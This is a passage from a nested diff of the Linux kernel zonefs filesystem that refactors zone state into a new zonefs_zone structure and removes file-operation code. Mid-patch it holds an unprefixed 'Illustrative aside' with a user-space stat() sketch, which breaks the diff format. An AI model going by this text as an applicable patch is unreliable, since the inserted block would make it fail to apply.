+-		iomap->type = IOMAP_HOLE;
+-		iomap->addr = IOMAP_NULL_ADDR;
+-		iomap->length = length;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_read_iomap_ops = {
+-	.iomap_begin	= zonefs_read_iomap_begin,
+-};
+-
+-static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
+-				    loff_t length, unsigned int flags,
+-				    struct iomap *iomap, struct iomap *srcmap)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-
+-	/* All write I/Os should always be within the file maximum size */
+-	if (WARN_ON_ONCE(offset + length > zi->i_max_size))
+-		return -EIO;
+-
+-	/*
+-	 * Sequential zones can only accept direct writes. This is already
+-	 * checked when writes are issued, so warn if we see a page writeback
+-	 * operation.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-			 !(flags & IOMAP_DIRECT)))
+-		return -EIO;
++	i_size_write(inode, isize);
+ 
+ 	/*
+-	 * For conventional zones, all blocks are always mapped. For sequential
+-	 * zones, all blocks after always mapped below the inode size (zone
+-	 * write pointer) and unwriten beyond.
++	 * A full zone is no longer open/active and does not need
++	 * explicit closing.
+ 	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_UNWRITTEN;
+-		iomap->length = zi->i_max_size - iomap->offset;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_write_iomap_ops = {
+-	.iomap_begin	= zonefs_write_iomap_begin,
+-};
+-
+-static int zonefs_read_folio(struct file *unused, struct folio *folio)
+-{
+-	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
+-}
+-
+-static void zonefs_readahead(struct readahead_control *rac)
+-{
+-	iomap_readahead(rac, &zonefs_read_iomap_ops);
+-}
+-
+-/*
+- * Map blocks for page writeback. This is used only on conventional zone files,
+- * which implies that the page range can only be within the fixed inode size.
+- */
+-static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
+-				   struct inode *inode, loff_t offset)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return -EIO;
+-	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
+-		return -EIO;
+-
+-	/* If the mapping is already OK, nothing needs to be done */
+-	if (offset >= wpc->iomap.offset &&
+-	    offset < wpc->iomap.offset + wpc->iomap.length)
+-		return 0;
+-
+-	return zonefs_write_iomap_begin(inode, offset, zi->i_max_size - offset,
+-					IOMAP_WRITE, &wpc->iomap, NULL);
+-}
+-
+-static const struct iomap_writeback_ops zonefs_writeback_ops = {
+-	.map_blocks		= zonefs_write_map_blocks,
+-};
+-
+-static int zonefs_writepages(struct address_space *mapping,
+-			     struct writeback_control *wbc)
+-{
+-	struct iomap_writepage_ctx wpc = { };
+-
+-	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
+-}
+-
+-static int zonefs_swap_activate(struct swap_info_struct *sis,
+-				struct file *swap_file, sector_t *span)
+-{
+-	struct inode *inode = file_inode(swap_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	if (isize >= z->z_capacity) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		zonefs_err(inode->i_sb,
+-			   "swap file: not a conventional zone file\n");
+-		return -EINVAL;
++		if (z->z_flags & ZONEFS_ZONE_ACTIVE)
++			atomic_dec(&sbi->s_active_seq_files);
++		z->z_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+ 	}
+-
+-	return iomap_swapfile_activate(sis, swap_file, span,
+-				       &zonefs_read_iomap_ops);
+ }
+ 
+-static const struct address_space_operations zonefs_file_aops = {
+-	.read_folio		= zonefs_read_folio,
+-	.readahead		= zonefs_readahead,
+-	.writepages		= zonefs_writepages,
+-	.dirty_folio		= filemap_dirty_folio,
+-	.release_folio		= iomap_release_folio,
+-	.invalidate_folio	= iomap_invalidate_folio,
+-	.migrate_folio		= filemap_migrate_folio,
+-	.is_partially_uptodate	= iomap_is_partially_uptodate,
+-	.error_remove_page	= generic_error_remove_page,
+-	.direct_IO		= noop_direct_IO,
+-	.swap_activate		= zonefs_swap_activate,
+-};
+-
+-static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
++void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -310,63 +183,68 @@ static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ }
+ 
+ /*
+- * Check a zone condition and adjust its file inode access permissions for
+- * offline and readonly zones. Return the inode size corresponding to the
+- * amount of readable data in the zone.
++ * Check a zone condition. Return the amount of written (and still readable)
++ * data in the zone.
+  */
+-static loff_t zonefs_check_zone_condition(struct inode *inode,
+-					  struct blk_zone *zone, bool warn,
+-					  bool mount)
++static loff_t zonefs_check_zone_condition(struct super_block *sb,
++					  struct zonefs_zone *z,
++					  struct blk_zone *zone)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+ 	switch (zone->cond) {
+ 	case BLK_ZONE_COND_OFFLINE:
+-		/*
+-		 * Dead zone: make the inode immutable, disable all accesses
+-		 * and set the file size to 0 (zone wp set to zone start).
+-		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: offline zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		inode->i_mode &= ~0777;
+-		zone->wp = zone->start;
+-		zi->i_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_warn(sb, "Zone %llu: offline zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_OFFLINE;
+ 		return 0;
+ 	case BLK_ZONE_COND_READONLY:
+ 		/*
+-		 * The write pointer of read-only zones is invalid. If such a
+-		 * zone is found during mount, the file size cannot be retrieved
+-		 * so we treat the zone as offline (mount == true case).
+-		 * Otherwise, keep the file size as it was when last updated
+-		 * so that the user can recover data. In both cases, writes are
+-		 * always disabled for the zone.
++		 * The write pointer of read-only zones is invalid, so we cannot
++		 * determine the zone wpoffset (inode size). We thus keep the
++		 * zone wpoffset as is, which leads to an empty file
++		 * (wpoffset == 0) on mount. For a runtime error, this keeps
++		 * the inode size as it was when last updated so that the user
++		 * can recover data.
+ 		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: read-only zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		if (mount) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			inode->i_mode &= ~0777;
+-			zone->wp = zone->start;
+-			zi->i_flags |= ZONEFS_ZONE_OFFLINE;
+-			return 0;
+-		}
+-		zi->i_flags |= ZONEFS_ZONE_READONLY;
+-		inode->i_mode &= ~0222;
+-		return i_size_read(inode);
++		zonefs_warn(sb, "Zone %llu: read-only zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_READONLY;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
++		return z->z_wpoffset;
+ 	case BLK_ZONE_COND_FULL:
+ 		/* The write pointer of full zones is invalid. */
+-		return zi->i_max_size;
++		return z->z_capacity;
+ 	default:
+-		if (zi->i_ztype == ZONEFS_ZTYPE_CNV)
+-			return zi->i_max_size;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
+ 		return (zone->wp - zone->start) << SECTOR_SHIFT;
+ 	}
+ }
+ 
++/*
++ * Check a zone condition and adjust its inode access permissions for
++ * offline and readonly zones.
++ */
++static void zonefs_inode_update_mode(struct inode *inode)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (z->z_flags & ZONEFS_ZONE_OFFLINE) {
++		/* Offline zones cannot be read nor written */
++		inode->i_flags |= S_IMMUTABLE;
++		inode->i_mode &= ~0777;
++	} else if (z->z_flags & ZONEFS_ZONE_READONLY) {
++		/* Readonly zones cannot be written */
++		inode->i_flags |= S_IMMUTABLE;
++		if (z->z_flags & ZONEFS_ZONE_INIT_MODE)
++			inode->i_mode &= ~0777;
++		else
++			inode->i_mode &= ~0222;
++	}
++
++	z->z_flags &= ~ZONEFS_ZONE_INIT_MODE;
++}
++
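Illustrative aside on zonefs_inode_update_mode() above: the zone condition is
surfaced to user space purely through the inode mode bits, so a stat(2) call
is enough to observe it. A hedged sketch (the path is an assumption):

/* Hedged user-space sketch; the path is an assumption, not from the patch. */
#include <stdio.h>
#include <sys/stat.h>

int main(void)
{
	struct stat st;

	if (stat("/mnt/zonefs/seq/0", &st))
		return 1;

	/*
	 * Offline zones clear all permission bits (mode 0000); read-only
	 * zones clear the write bits (0222 masked off).
	 */
	printf("mode: %04o\n", st.st_mode & 07777);

	return 0;
}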
+ struct zonefs_ioerr_data {
+ 	struct inode	*inode;
+ 	bool		write;
+@@ -377,7 +255,7 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ {
+ 	struct zonefs_ioerr_data *err = data;
+ 	struct inode *inode = err->inode;
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	loff_t isize, data_size;
+@@ -388,10 +266,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * as there is no inconsistency between the inode size and the amount of
+ 	 * data writen in the zone (data_size).
+ 	 */
+-	data_size = zonefs_check_zone_condition(inode, zone, true, false);
++	data_size = zonefs_check_zone_condition(sb, z, zone);
+ 	isize = i_size_read(inode);
+-	if (zone->cond != BLK_ZONE_COND_OFFLINE &&
+-	    zone->cond != BLK_ZONE_COND_READONLY &&
++	if (!(z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)) &&
+ 	    !err->write && isize == data_size)
+ 		return 0;
+ 
+@@ -414,8 +291,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * In all cases, warn about inode size inconsistency and handle the
+ 	 * IO error according to the zone condition and to the mount options.
+ 	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && isize != data_size)
+-		zonefs_warn(sb, "inode %lu: invalid size %lld (should be %lld)\n",
++	if (zonefs_zone_is_seq(z) && isize != data_size)
++		zonefs_warn(sb,
++			    "inode %lu: invalid size %lld (should be %lld)\n",
+ 			    inode->i_ino, isize, data_size);
+ 
+ 	/*
+@@ -424,24 +302,22 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * zone condition to read-only and offline respectively, as if the
+ 	 * condition was signaled by the hardware.
+ 	 */
+-	if (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	    sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL) {
++	if ((z->z_flags & ZONEFS_ZONE_OFFLINE) ||
++	    (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZOL)) {
+ 		zonefs_warn(sb, "inode %lu: read/write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_OFFLINE) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
+-	} else if (zone->cond == BLK_ZONE_COND_READONLY ||
+-		   sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO) {
++		if (!(z->z_flags & ZONEFS_ZONE_OFFLINE))
++			z->z_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_inode_update_mode(inode);
++		data_size = 0;
++	} else if ((z->z_flags & ZONEFS_ZONE_READONLY) ||
++		   (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_ZRO)) {
+ 		zonefs_warn(sb, "inode %lu: write access disabled\n",
+ 			    inode->i_ino);
+-		if (zone->cond != BLK_ZONE_COND_READONLY) {
+-			zone->cond = BLK_ZONE_COND_READONLY;
+-			data_size = zonefs_check_zone_condition(inode, zone,
+-								false, false);
+-		}
++		if (!(z->z_flags & ZONEFS_ZONE_READONLY))
++			z->z_flags |= ZONEFS_ZONE_READONLY;
++		zonefs_inode_update_mode(inode);
++		data_size = isize;
+ 	} else if (sbi->s_mount_opts & ZONEFS_MNTOPT_ERRORS_RO &&
+ 		   data_size > isize) {
+ 		/* Do not expose garbage data */
+@@ -455,9 +331,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 * close of the zone when the inode file is closed.
+ 	 */
+ 	if ((sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) &&
+-	    (zone->cond == BLK_ZONE_COND_OFFLINE ||
+-	     zone->cond == BLK_ZONE_COND_READONLY))
+-		zi->i_flags &= ~ZONEFS_ZONE_OPEN;
++	    (z->z_flags & (ZONEFS_ZONE_READONLY | ZONEFS_ZONE_OFFLINE)))
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
+ 
+ 	/*
+ 	 * If error=remount-ro was specified, any error result in remounting
+@@ -474,8 +349,8 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+ 	 */
+ 	zonefs_update_stats(inode, data_size);
+ 	zonefs_i_size_write(inode, data_size);
+-	zi->i_wpoffset = data_size;
+-	zonefs_account_active(inode);
++	z->z_wpoffset = data_size;
++	zonefs_inode_account_active(inode);
+ 
+ 	return 0;
+ }
+@@ -487,9 +362,9 @@ static int zonefs_io_error_cb(struct blk_zone *zone, unsigned int idx,
+  * eventually correct the file size and zonefs inode write pointer offset
+  * (which can be out of sync with the drive due to partial write failures).
+  */
+-static void __zonefs_io_error(struct inode *inode, bool write)
++void __zonefs_io_error(struct inode *inode, bool write)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 	unsigned int noio_flag;
+@@ -505,8 +380,8 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * files with aggregated conventional zones, for which the inode zone
+ 	 * size is always larger than the device zone size.
+ 	 */
+-	if (zi->i_zone_size > bdev_zone_sectors(sb->s_bdev))
+-		nr_zones = zi->i_zone_size >>
++	if (z->z_size > bdev_zone_sectors(sb->s_bdev))
++		nr_zones = z->z_size >>
+ 			(sbi->s_zone_sectors_shift + SECTOR_SHIFT);
+ 
+ 	/*
+@@ -518,7 +393,7 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	 * the GFP_NOIO context avoids both problems.
+ 	 */
+ 	noio_flag = memalloc_noio_save();
+-	ret = blkdev_report_zones(sb->s_bdev, zi->i_zsector, nr_zones,
++	ret = blkdev_report_zones(sb->s_bdev, z->z_sector, nr_zones,
+ 				  zonefs_io_error_cb, &err);
+ 	if (ret != nr_zones)
+ 		zonefs_err(sb, "Get inode %lu zone information failed %d\n",
+@@ -526,749 +401,6 @@ static void __zonefs_io_error(struct inode *inode, bool write)
+ 	memalloc_noio_restore(noio_flag);
+ }
+ 
+-static void zonefs_io_error(struct inode *inode, bool write)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	mutex_lock(&zi->i_truncate_mutex);
+-	__zonefs_io_error(inode, write);
+-	mutex_unlock(&zi->i_truncate_mutex);
+-}
+-
+-static int zonefs_file_truncate(struct inode *inode, loff_t isize)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t old_isize;
+-	enum req_op op;
+-	int ret = 0;
+-
+-	/*
+-	 * Only sequential zone files can be truncated and truncation is allowed
+-	 * only down to a 0 size, which is equivalent to a zone reset, and to
+-	 * the maximum file size, which is equivalent to a zone finish.
+-	 */
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-		return -EPERM;
+-
+-	if (!isize)
+-		op = REQ_OP_ZONE_RESET;
+-	else if (isize == zi->i_max_size)
+-		op = REQ_OP_ZONE_FINISH;
+-	else
+-		return -EPERM;
+-
+-	inode_dio_wait(inode);
+-
+-	/* Serialize against page faults */
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/* Serialize against zonefs_iomap_begin() */
+-	mutex_lock(&zi->i_truncate_mutex);
+-
+-	old_isize = i_size_read(inode);
+-	if (isize == old_isize)
+-		goto unlock;
+-
+-	ret = zonefs_zone_mgmt(inode, op);
+-	if (ret)
+-		goto unlock;
+-
+-	/*
+-	 * If the mount option ZONEFS_MNTOPT_EXPLICIT_OPEN is set,
+-	 * take care of open zones.
+-	 */
+-	if (zi->i_flags & ZONEFS_ZONE_OPEN) {
+-		/*
+-		 * Truncating a zone to EMPTY or FULL is the equivalent of
+-		 * closing the zone. For a truncation to 0, we need to
+-		 * re-open the zone to ensure new writes can be processed.
+-		 * For a truncation to the maximum file size, the zone is
+-		 * closed and writes cannot be accepted anymore, so clear
+-		 * the open flag.
+-		 */
+-		if (!isize)
+-			ret = zonefs_zone_mgmt(inode, REQ_OP_ZONE_OPEN);
+-		else
+-			zi->i_flags &= ~ZONEFS_ZONE_OPEN;
+-	}
+-
+-	zonefs_update_stats(inode, isize);
+-	truncate_setsize(inode, isize);
+-	zi->i_wpoffset = isize;
+-	zonefs_account_active(inode);
+-
+-unlock:
+-	mutex_unlock(&zi->i_truncate_mutex);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-
+-	return ret;
+-}
+-
+-static int zonefs_inode_setattr(struct user_namespace *mnt_userns,
+-				struct dentry *dentry, struct iattr *iattr)
+-{
+-	struct inode *inode = d_inode(dentry);
+-	int ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	ret = setattr_prepare(&init_user_ns, dentry, iattr);
+-	if (ret)
+-		return ret;
+-
+-	/*
+-	 * Since files and directories cannot be created nor deleted, do not
+-	 * allow setting any write attributes on the sub-directories grouping
+-	 * files by zone type.
+-	 */
+-	if ((iattr->ia_valid & ATTR_MODE) && S_ISDIR(inode->i_mode) &&
+-	    (iattr->ia_mode & 0222))
+-		return -EPERM;
+-
+-	if (((iattr->ia_valid & ATTR_UID) &&
+-	     !uid_eq(iattr->ia_uid, inode->i_uid)) ||
+-	    ((iattr->ia_valid & ATTR_GID) &&
+-	     !gid_eq(iattr->ia_gid, inode->i_gid))) {
+-		ret = dquot_transfer(mnt_userns, inode, iattr);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	if (iattr->ia_valid & ATTR_SIZE) {
+-		ret = zonefs_file_truncate(inode, iattr->ia_size);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	setattr_copy(&init_user_ns, inode, iattr);
+-
+-	return 0;
+-}
+-
+-static const struct inode_operations zonefs_file_inode_operations = {
+-	.setattr	= zonefs_inode_setattr,
+-};
+-
+-static int zonefs_file_fsync(struct file *file, loff_t start, loff_t end,
+-			     int datasync)
+-{
+-	struct inode *inode = file_inode(file);
+-	int ret = 0;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return -EPERM;
+-
+-	/*
+-	 * Since only direct writes are allowed in sequential files, page cache
+-	 * flush is needed only for conventional zone files.
+-	 */
+-	if (ZONEFS_I(inode)->i_ztype == ZONEFS_ZTYPE_CNV)
+-		ret = file_write_and_wait_range(file, start, end);
+-	if (!ret)
+-		ret = blkdev_issue_flush(inode->i_sb->s_bdev);
+-
+-	if (ret)
+-		zonefs_io_error(inode, true);
+-
+-	return ret;
+-}
+-
+-static vm_fault_t zonefs_filemap_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct inode *inode = file_inode(vmf->vma->vm_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	vm_fault_t ret;
+-
+-	if (unlikely(IS_IMMUTABLE(inode)))
+-		return VM_FAULT_SIGBUS;
+-
+-	/*
+-	 * Sanity check: only conventional zone files can have shared
+-	 * writeable mappings.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return VM_FAULT_NOPAGE;
+-
+-	sb_start_pagefault(inode->i_sb);
+-	file_update_time(vmf->vma->vm_file);
+-
+-	/* Serialize against truncates */
+-	filemap_invalidate_lock_shared(inode->i_mapping);
+-	ret = iomap_page_mkwrite(vmf, &zonefs_write_iomap_ops);
+-	filemap_invalidate_unlock_shared(inode->i_mapping);
+-
+-	sb_end_pagefault(inode->i_sb);
+-	return ret;
+-}
+-
+-static const struct vm_operations_struct zonefs_file_vm_ops = {
+-	.fault		= filemap_fault,
+-	.map_pages	= filemap_map_pages,
+-	.page_mkwrite	= zonefs_filemap_page_mkwrite,
+-};
+-
+-static int zonefs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	/*
+-	 * Conventional zones accept random writes, so their files can support
+-	 * shared writable mappings. For sequential zone files, only read
+-	 * mappings are possible since there are no guarantees for write
+-	 * ordering between msync() and page cache writeback.
+-	 */
+-	if (ZONEFS_I(file_inode(file))->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-	    (vma->vm_flags & VM_SHARED) && (vma->vm_flags & VM_MAYWRITE))
+-		return -EINVAL;
+-
+-	file_accessed(file);
+-	vma->vm_ops = &zonefs_file_vm_ops;
+-
+-	return 0;
+-}
+-
+-static loff_t zonefs_file_llseek(struct file *file, loff_t offset, int whence)
+-{
+-	loff_t isize = i_size_read(file_inode(file));
+-
+-	/*
+-	 * Seeks are limited to below the zone size for conventional zones
+-	 * and below the zone write pointer for sequential zones. In both
+-	 * cases, this limit is the inode size.
+-	 */
+-	return generic_file_llseek_size(file, offset, whence, isize, isize);
+-}
+-
+-static int zonefs_file_write_dio_end_io(struct kiocb *iocb, ssize_t size,
+-					int error, unsigned int flags)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (error) {
+-		zonefs_io_error(inode, true);
+-		return error;
+-	}
+-
+-	if (size && zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		/*
+-		 * Note that we may be seeing completions out of order,
+-		 * but that is not a problem since a write completed
+-		 * successfully necessarily means that all preceding writes
+-		 * were also successful. So we can safely increase the inode
+-		 * size to the write end location.
+-		 */
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (i_size_read(inode) < iocb->ki_pos + size) {
+-			zonefs_update_stats(inode, iocb->ki_pos + size);
+-			zonefs_i_size_write(inode, iocb->ki_pos + size);
+-		}
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct iomap_dio_ops zonefs_write_dio_ops = {
+-	.end_io			= zonefs_file_write_dio_end_io,
+-};
+-
+-static ssize_t zonefs_file_dio_append(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct block_device *bdev = inode->i_sb->s_bdev;
+-	unsigned int max = bdev_max_zone_append_sectors(bdev);
+-	struct bio *bio;
+-	ssize_t size;
+-	int nr_pages;
+-	ssize_t ret;
+-
+-	max = ALIGN_DOWN(max << SECTOR_SHIFT, inode->i_sb->s_blocksize);
+-	iov_iter_truncate(from, max);
+-
+-	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
+-	if (!nr_pages)
+-		return 0;
+-
+-	bio = bio_alloc(bdev, nr_pages,
+-			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
+-	bio->bi_iter.bi_sector = zi->i_zsector;
+-	bio->bi_ioprio = iocb->ki_ioprio;
+-	if (iocb_is_dsync(iocb))
+-		bio->bi_opf |= REQ_FUA;
+-
+-	ret = bio_iov_iter_get_pages(bio, from);
+-	if (unlikely(ret))
+-		goto out_release;
+-
+-	size = bio->bi_iter.bi_size;
+-	task_io_account_write(size);
+-
+-	if (iocb->ki_flags & IOCB_HIPRI)
+-		bio_set_polled(bio, iocb);
+-
+-	ret = submit_bio_wait(bio);
+-
+-	/*
+-	 * If the file zone was written underneath the file system, the zone
+-	 * write pointer may not be where we expect it to be, but the zone
+-	 * append write can still succeed. So check manually that we wrote where
+-	 * we intended to, that is, at zi->i_wpoffset.
+-	 */
+-	if (!ret) {
+-		sector_t wpsector =
+-			zi->i_zsector + (zi->i_wpoffset >> SECTOR_SHIFT);
+-
+-		if (bio->bi_iter.bi_sector != wpsector) {
+-			zonefs_warn(inode->i_sb,
+-				"Corrupted write pointer %llu for zone at %llu\n",
+-				wpsector, zi->i_zsector);
+-			ret = -EIO;
+-		}
+-	}
+-
+-	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
+-	trace_zonefs_file_dio_append(inode, size, ret);
+-
+-out_release:
+-	bio_release_pages(bio, false);
+-	bio_put(bio);
+-
+-	if (ret >= 0) {
+-		iocb->ki_pos += size;
+-		return size;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Do not exceed the LFS limits nor the file zone size. If pos is under the
+- * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
+- */
+-static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
+-					loff_t count)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t limit = rlimit(RLIMIT_FSIZE);
+-	loff_t max_size = zi->i_max_size;
+-
+-	if (limit != RLIM_INFINITY) {
+-		if (pos >= limit) {
+-			send_sig(SIGXFSZ, current, 0);
+-			return -EFBIG;
+-		}
+-		count = min(count, limit - pos);
+-	}
+-
+-	if (!(file->f_flags & O_LARGEFILE))
+-		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
+-
+-	if (unlikely(pos >= max_size))
+-		return -EFBIG;
+-
+-	return min(count, max_size - pos);
+-}
+-
+-static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct file *file = iocb->ki_filp;
+-	struct inode *inode = file_inode(file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	loff_t count;
+-
+-	if (IS_SWAPFILE(inode))
+-		return -ETXTBSY;
+-
+-	if (!iov_iter_count(from))
+-		return 0;
+-
+-	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
+-		return -EINVAL;
+-
+-	if (iocb->ki_flags & IOCB_APPEND) {
+-		if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
+-			return -EINVAL;
+-		mutex_lock(&zi->i_truncate_mutex);
+-		iocb->ki_pos = zi->i_wpoffset;
+-		mutex_unlock(&zi->i_truncate_mutex);
+-	}
+-
+-	count = zonefs_write_check_limits(file, iocb->ki_pos,
+-					  iov_iter_count(from));
+-	if (count < 0)
+-		return count;
+-
+-	iov_iter_truncate(from, count);
+-	return iov_iter_count(from);
+-}
+-
+-/*
+- * Handle direct writes. For sequential zone files, this is the only possible
+- * write path. For these files, check that the user is issuing writes
+- * sequentially from the end of the file. This code assumes that the block layer
+- * delivers write requests to the device in sequential order. This is always the
+- * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
+- * elevator feature is being used (e.g. mq-deadline). The block layer always
+- * automatically select such an elevator for zoned block devices during the
+- * device initialization.
+- */
+-static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	bool sync = is_sync_kiocb(iocb);
+-	bool append = false;
+-	ssize_t ret, count;
+-
+-	/*
+-	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
+-	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
+-	 * on the inode lock but the second goes through but is now unaligned).
+-	 */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ && !sync &&
+-	    (iocb->ki_flags & IOCB_NOWAIT))
+-		return -EOPNOTSUPP;
+-
+-	if (iocb->ki_flags & IOCB_NOWAIT) {
+-		if (!inode_trylock(inode))
+-			return -EAGAIN;
+-	} else {
+-		inode_lock(inode);
+-	}
+-
+-	count = zonefs_write_checks(iocb, from);
+-	if (count <= 0) {
+-		ret = count;
+-		goto inode_unlock;
+-	}
+-
+-	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
+-		ret = -EINVAL;
+-		goto inode_unlock;
+-	}
+-
+-	/* Enforce sequential writes (append only) in sequential zones */
+-	if (zi->i_ztype == ZONEFS_ZTYPE_SEQ) {
+-		mutex_lock(&zi->i_truncate_mutex);
+-		if (iocb->ki_pos != zi->i_wpoffset) {
+-			mutex_unlock(&zi->i_truncate_mutex);
+-			ret = -EINVAL;
